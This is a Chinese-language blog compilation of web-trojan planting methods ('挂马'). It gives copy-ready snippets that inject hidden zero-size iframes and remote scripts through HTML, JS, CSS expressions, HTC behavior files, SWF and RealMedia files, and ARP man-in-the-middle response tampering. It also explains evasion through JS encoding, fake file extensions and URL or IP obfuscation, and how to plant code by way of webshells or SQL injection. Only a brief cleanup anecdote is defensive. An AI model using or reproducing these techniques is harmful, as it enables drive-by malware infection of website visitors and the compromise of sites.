现在的位置: 首页 > 综合 > 正文

挂马方法大全

2013年04月19日 ⁄ 综合 ⁄ 共 7101字 ⁄ 字号 评论关闭

一:框架挂马

<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马

首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>

三:js变形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马

<body onload="window.location='地址';"></body>

五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML + '\r\n

<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

六:css中挂马

body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

七:JAJA挂马

<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,

menubar=no,scro llbars=no,width=1,height=1");
</script>

八:图片伪装

<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>

九:伪装调用:

<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

十:高级欺骗

<a href=http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)

onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,

menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

十一: 超级网马—通过arp欺骗来直接挂马

原理:arp中间人攻击,实际上相当于做了一次代理。

正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A---->C---->B
B---->C---->A
实际上,C在这里做了一次代理的作用

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如 <iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了。

如何处理网页木马:

1、找到嵌入的网页木马文件。以下,拿自己的经历说事。找到的文件是wm.htm

2、在注册表中查找wm.htm。很幸运,找到了。开始顺藤摸瓜...

3、修改键值wm.htm为wm_nnd.htm。

4、再次查找wm.htm。很不幸,又查到了。说明有服务程序在作怪。嘿嘿,有意外发现。
cain.exe,据说是密码嗅探器。

5、修改键值cain.exe为cain_nnd.exe。

6、查找cain.exe,仍然可以查到。嘻嘻,在预料之中。

7、怀疑wm.htm与cain.exe同流合污,背后有服务程序作后台。

8、快查查看,系统服务程序。在运行->msconfig 或直接在命令行使用net start,查看可疑程序

9、发现temp*.exe(全名记不清了),立马net stop server 。

10、快去修改键值wm.htm为wm_nnd.htm,cain.exe为cain_nnd.exe。

11、再次查找wm.htm或cain.exe,没有找到。哈哈,很好。

12、观察了几天,没再发生挂马的现象。

 //------------------------------------------------------------------------------------------------------

网页挂马方法和技巧大汇总
详细出处参考:http://www.jb51.net/hack/16663.html 

1,挂马的N种方法
  (1) HTML挂马法。
  常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>。查看站点是否被挂,一般是查找一下关键词iframe。

  (2) 再隐藏一点的就是js挂马了。
  像再原来的网页中写入<script str=http://www.xxx.com/horse.js></script>,horse里的js写法一般为 document.write(’http:\/\/www.xxx.com\/horse.html’>;,或者专业一点的写法是 top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n<inframe src=”http://www.xxx.com/horse.htm/”></iframe>’;。不过第2种写法要注意:是原来的网页种要有body标签。

  (3) 在 css中挂马。
  这个方法就是在css中写入:
  body {
hytop:expression(top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n<iframe src=”http://www.xxx.com/horse.html/”></iframe>’);

}
  然后在主页中调用这个CSS,代码类似 这样的。在csdn 中对expression的解释是:IE5及其以后版本支持在CSS中使用expression,用来吧CSS属性和Javascript表达式关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性。也就是说CSS属性后面可以是一段Javasccript表达式,CSS属性的值等于 Javascript表达式计算的结果。在表达式中可以是直接一用元素自身的属性和方法,也可以使用其它浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。整个解释关键点是expression可以在css中引入js语句,所以我们可用于挂马。不过写的语句值可以远程调用,本地不可以。

  (4) 在swf中挂马
  网上有一些swf挂马的工具,可以用工具替换原来网页中的swf或单独把swf发给对方,一可以单独作一个可显示swf页的网页。在网页中插入swf的语法一般格式为:

  <OBJECT classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5.0.0.0 WIDTH=760 NAME=quality VALUE=high> <EMBED src=”http://www.7747.net/xxx.swf” quality=high pluginspage=http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash
type=application/x-shockwave-flash width=760 height=60></EMBED></OBJECT>
  (5) 在影音文件中挂马
  所需工具是RealMedia Editor,打开工具后,然后依次选择“文件”-“打开Real媒体文件”,然后选择需要编辑的视频文件,其格式必须是RealOne公司的以RM或 RMVB为扩展名的文件。接着,新建一个文本,在里面输入u 00:00:10:0 00:00:30.0&&_rpexternal&&http://www.xxx.com/horse.htm

  (00:00:10.0就是发生第一事件的时间,这里是让计算机弹出网页;00:00:30.0同样,这是第二次发生的时间,在0时0分第30秒0微妙时弹出窗口;而后面的URL地址就是连接指定的木马地址。)

  输入完毕后并保存,然后依次选择“工具”-“合并事件”,导入刚才的文本。当合并完成后,依次选择“文本”-“Real文件另存为”,保存好即可。
  最后把生成的视频文件发布网上,当对方观看同时就会连接到你指定的木马地址。
  2,挂马的技巧
  挂马首先要求的是隐蔽性,这样挂的时间才能长。像在SWF、JS、RM中挂马就是比较隐蔽了,但是还可再用到些技巧。
  (1)远程任意后缀执行HTML
  可以把horse.html成horse.jpg之类的后缀,然后语句写成<iframe src=/uploadfile/200902/20090220105353594.jpg width=0 height=0></iframe>。js也可以,语句为<script src=/uploadfile/200902/20090220105353594.jpg></script>,甚至js的不要后缀名都可以。

  (2)JS的加密
  为了保护网页木马的代码,可以把JS内容加密,还能躲开杀软的作用。如果使用ENCODE加密方式,加密后的JS调用语句就用。除此方法外,还有其它更多的方法!
  (3)URL的变形
  URL的变形方法也有很多,例如将url的16进制转换为encod编码等。如果是涉及到URL欺骗的方法就更多了,不过多数的URL欺骗,像利用@的技巧,IE都已经打补丁了。但现在有个漏洞仍然有效,代码如下:

  <a id=”CZY” href=”http://www.baidu.com”></a>
  <div>
  <a href=”http://www.google.cn” target=”_blank”>
  <table>
  <caption>
  <a href=”http://www.google.cn” target=”_blank”>
  <label for=”CZY”>
  <u style=”cursor: pointer: color: blue”>
  Google</u>
  </label></a></caption></table></a></div>
  保存该代码为网页后,鼠标移动到Google这个链接上时,IE状态栏显示的是http://www.google.cn,但点击链接后却打开http: //www.baidu.com网站。如果你的网马可以用IP地址访问到的话,IP地址也可以进行转换的。像127.0.0.1这样的IP还可以变为 2130706433、0×7f.0×00.0×00.0×01、0177.0000.0000.0001等等,这只不过是8进制、10进制、16进制、的转换而已。

  3,如何才能挂到马
  拿到了webshell的话,挂马自然是很简单了。但是拿不到的情况下,如果注入点有update权限,我们可以仔细查找首页中的某条新闻的调用链接,然后update数据库达到我们的目的。如果可进入后台,我没就可以在一些发公告的地方写入自己的木马代码(不过千万别打乱前台html源文件里的代码逻辑)。

详细出处参考:http://www.jb51.net/hack/16663.html

 //------------------------------------------------------------------------------------------------------

挂马的两个新方法(11期黑客手册稿子)

 

作者:lcx

这里只做技术讨论,不做具体危害的事。如果你要用我的方法去做,我也没办法,呵呵。关于挂马,基本上是在网页原来的代码里加载一个iframe。关于加载iframe,我以前的文章写过几种,这篇文章里再提两个新方法吧。

一、利用htc文件来加载iframe。
百度百科里对htc文件的解释为:从5.5版本开始,Internet Explorer(IE)开始支持Web 行为的概念。这些行为是由后缀名为.htc的脚本文件描述的,它们定义了一套方法和属性,程序员几乎可以把这些方法和属性应用到HTML页面上的任何元素 上去。Web 行为是非常伟大的因为它们允许程序员把自定义的功能“连接”到现有的元素和控件,而不是必须让用户下载二进制文件(例如ActiveX 控件)来完成这个功能。Web 行为还是推荐的扩展IE对象模型和控件集的方法。微软在它的开发者站点上的DHTML 行为库栏目里提供了几个定制的Web行为。
这些专业的术语看看就头疼,我们看实际应用。先来看一下vbs写的hello.htc

<attach event="ondocumentready" ONEVENT="Hello()" />

<script language="VBScript">

Function Hello()
MsgBox "Hello, World!"
End Function

</script>

我们再来写一个1.htm来调用,代码:

<html>
<body style="behavior: url(hello.htc)">
</body>
</html>

我们把hello.htc和1.htm放在同一个目录下,用ie执行1.htm就会成功弹出一个hello world对话框。如果用vbs来执行的话,中马的人只有ie用户了,用火狐的就漏掉了,我们改成js的,直接用1.htm加载新的hello.htc, 新的代码为:

<attach event="ondocumentready" ONEVENT="hello()" />

<script>
function hello()
{
var O = document.createElement("iframe");
O.width = '0';
O.height = '0';
O.src="http://www.sohu.com";
ownerDocument.body.appendChild(O); //注意看,这里用的是ownerDocument,这是精华。
}
</script>

这样你把hello.htc传到对方网站目录下,然后在对方页面里加上<body style="behavior: url(hellow1.htc)">就可以成功加载框加了,呵呵。

二、关于swf加载网马的简便做法
用swf直接加载iframe也不是什么新方法了,不过我这里有一个简单做法,用到的软件就是flasm。我已经做好了一个模板,是swf.swf。我们在dos下运行flasm -d swf.swf>swf.flm,如图1所示。

图1

其中flasm -d swf.swf>swf.flm是生成swf.flm,如果不加>swf.flm是直接显示源码了。你只需要改变图1当中的url地址和框架 高度就可以了。改变地址后,我们再运行一个命令:flasm -a swf.flm就生成你需要的swf了,如图2所示。

图2

我们再写一个swf.htm调用,代码为:

<head>
</head>
<body>
<embed src=swf.swf witdh=0 height=0></embed>
</body>

注意的是<embed src=swf.swf witdh=0 height=0></embed> 一定要加在body中间,要不然你不会成功,这是和我写的as代码有关。如果大家有什么疑问,可以去我的blog:http://hi.baidu.com/myvbscript
[文章中的文件1.htm、hello.htc以及swf.htm、swf.htc、flasm.rar已收录在本期光盘]

注:这里我做的flash样本没有提供,也没有什么了,大家主要看看htc的方法吧

 

【上篇】的实用技巧
【下篇】

抱歉!评论已关闭.